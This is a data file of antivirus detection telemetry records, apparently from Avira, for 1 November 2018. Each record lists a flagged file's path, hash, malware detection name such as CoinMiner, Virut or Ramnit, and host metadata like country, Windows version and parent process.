  Row(detection=Row(filename='nmworker.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Zecminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:32:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Dropbox\\NiceHash\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/systemstartup', country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-01T21:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121741-547d2f90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dda9b780\\AVSCAN-20181101-121710-39A1966B\\AVSCAN-20181101-121741-547D2F90', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NICE old\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WXVXpfv+LkemExuC.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.vir', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T15:36:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Ozy\\RESTORED\\2018-04-08_14-15-30\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:42:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner_5a1aa96c.exe', filepath='E:\\Ozy\\RESTORED\\2018-04-08_14-15-30\\miner_5a1aa96c.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T20:42:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222748-d926ca10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0d9eac89\\AVSCAN-20181101-222733-D6192015\\AVSCAN-20181101-222748-D926CA10', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-000923-043a17bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a693d56\\AVSCAN-20181101-000803-D50C3FD5\\AVSCAN-20181101-000923-043A17BC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NHML-1.8.1.10\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:l8hiGMlKnE2EiQ\\\\\\/N.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sessionmanager.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\9250.tmp\\Sessionmanager.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\7B5E.tmp\\NVIDIA.exe', parentsize=2208768, timestamp='2018-11-01T01:33:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:35:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\NHML-1.8.1.6\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T04:16:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234924-898dbbf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be6e301a\\AVSCAN-20181101-234850-846CE103\\AVSCAN-20181101-234924-898DBBF0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:49:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201619-b96d669d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201603-B6646B1B\\AVSCAN-20181101-201619-B96D669D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:16:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201625-bab74bc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3856b854\\AVSCAN-20181101-201603-B6646B1B\\AVSCAN-20181101-201625-BAB74BC6', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='202601908.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\202601908.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-01T19:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214307-7573b309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1875d52\\AVSCAN-20181101-214244-723196F0\\AVSCAN-20181101-214307-7573B309', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:43:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214323-77d25556', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b1875d52\\AVSCAN-20181101-214244-723196F0\\AVSCAN-20181101-214323-77D25556', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:43:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\zec seb1 - Copie (2)\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zec.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:03:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233615-f6d18fdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2781180c\\AVSCAN-20181031-233236-D97E4C1A\\AVSCAN-20181031-233615-F6D18FDB', filesize=752000, name='APPL/InstallBrain.AH.#M1.#R1'), hash='8502cc35c3059806fdd86988167a5d752984b1e93a8b5df5f6126591cae0ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-233615-f6ba461e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2781180c\\AVSCAN-20181031-233236-D97E4C1A\\AVSCAN-20181031-233615-F6BA461E', filesize=752000, name='APPL/InstallBrain.AH.#M1.#R1'), hash='8502cc35c3059806fdd86988167a5d752984b1e93a8b5df5f6126591cae0ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161705-f67d1af5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161705-F67D1AF5', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='số liệu hệ người  nghiện đến tháng 10.2018.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Số liệu hệ người  nghiện đến tháng 10.2018.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161441-e75be933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161441-E75BE933', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='8515fb47c385fe17a5c97cfda5fc0b26f97b7c7b1c8e444d9af2c70bfb862c33', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:14:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง\\หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='8555a0cd5f00b2189166e8c83976697567a1d36abf3016151210acd646f5d0da', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='856ef3fe7f32d162c5970cddbfd18af07dedce063614658d6a75361781fea6b6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\856EF3FE7F32D162C5970CDDBFD18AF07DEDCE063614658D6A75361781FEA6B6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='856ef3fe7f32d162c5970cddbfd18af07dedce063614658d6a75361781fea6b6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7zfm.exe', filepath='C:\\Program Files (x86)\\7-Zip\\7zFM.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='85ad00cd2fc6ffe9eefadabab58a16008a32609818815498eb7331536c825972', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85b40609edccf2cbf2b9d366e6e2b055382cd838450e7ab0655cb7589c0a85b0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\85B40609EDCCF2CBF2B9D366E6E2B055382CD838450E7AB0655CB7589C0A85B0', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='85b40609edccf2cbf2b9d366e6e2b055382cd838450e7ab0655cb7589c0a85b0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dac8c3e6135108f0daff19a1f742b877be0a4b98', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\dac8c3e6135108f0daff19a1f742b877be0a4b98', filesize=1984000, name='W32/Virut.Gen.#M1.#R1'), hash='85b4989a33a7e51e1edede143265822ecf0b08e7ad4b65b94d8a80d61806d50c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T07:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dac8c3e6135108f0daff19a1f742b877be0a4b98', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\dac8c3e6135108f0daff19a1f742b877be0a4b98', filesize=1984000, name='W32/Virut.Gen.#M1.#R1'), hash='85b4989a33a7e51e1edede143265822ecf0b08e7ad4b65b94d8a80d61806d50c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:50:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\85C502F0CD2C224A2C99EE96BAE85F09AFB2443CC19E5DEFEF72ABDE35B1DC87', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\85C502F0CD2C224A2C99EE96BAE85F09AFB2443CC19E5DEFEF72ABDE35B1DC87', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='85c502f0cd2c224a2c99ee96bae85f09afb2443cc19e5defef72abde35b1dc87', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006824', filepath='C:\\Windows\\Temp\\e73a0538-c507-43c3-9910-d6997c4f2634\\tmp000003bf\\tmp00006824', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='85c661e1d400137f32316ce58ece6cf3f2ddb4bf9595a2321863e97658bc579e', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T15:25:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='860959cf41322f3fb28ce604a8afd266988f8e6183ee16e5db106714dc044943', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_a.html', filepath='C:\\Program Files\\Adobe\\Adobe Bridge CS3\\resource\\adobe_epic\\personalization\\sl_SI\\install_a.html', filesize=136000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='878dbd7529f499c1adf7efc17b062cc59fe5096ece1e1f8f9d3873a19253b3ba', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T20:00:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='87e3e3d277d65e6f136e09c210c906d5b06446fdbe24c762da269fdc8d33db15', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\87E3E3D277D65E6F136E09C210C906D5B06446FDBE24C762DA269FDC8D33DB15', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='87e3e3d277d65e6f136e09c210c906d5b06446fdbe24c762da269fdc8d33db15', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='K:\\HBCD\\Programs\\NTBOOTAUTOFIX.EXE', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191327-4643de30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191327-4643DE30', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195043-c4059ab8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195043-C4059AB8', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='883de4c89242509f493da942956e3a8a8e20f7294e78897f00f51138fe954c01', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\883DE4C89242509F493DA942956E3A8A8E20F7294E78897F00F51138FE954C01', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='883de4c89242509f493da942956e3a8a8e20f7294e78897f00f51138fe954c01', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-214619-32fd1d7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93bac124\\AVSCAN-20181031-214509-2A1935B3\\AVSCAN-20181031-214619-32FD1D7D', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:46:32Z'), dt=datetime.date(2018, 11, 1)),
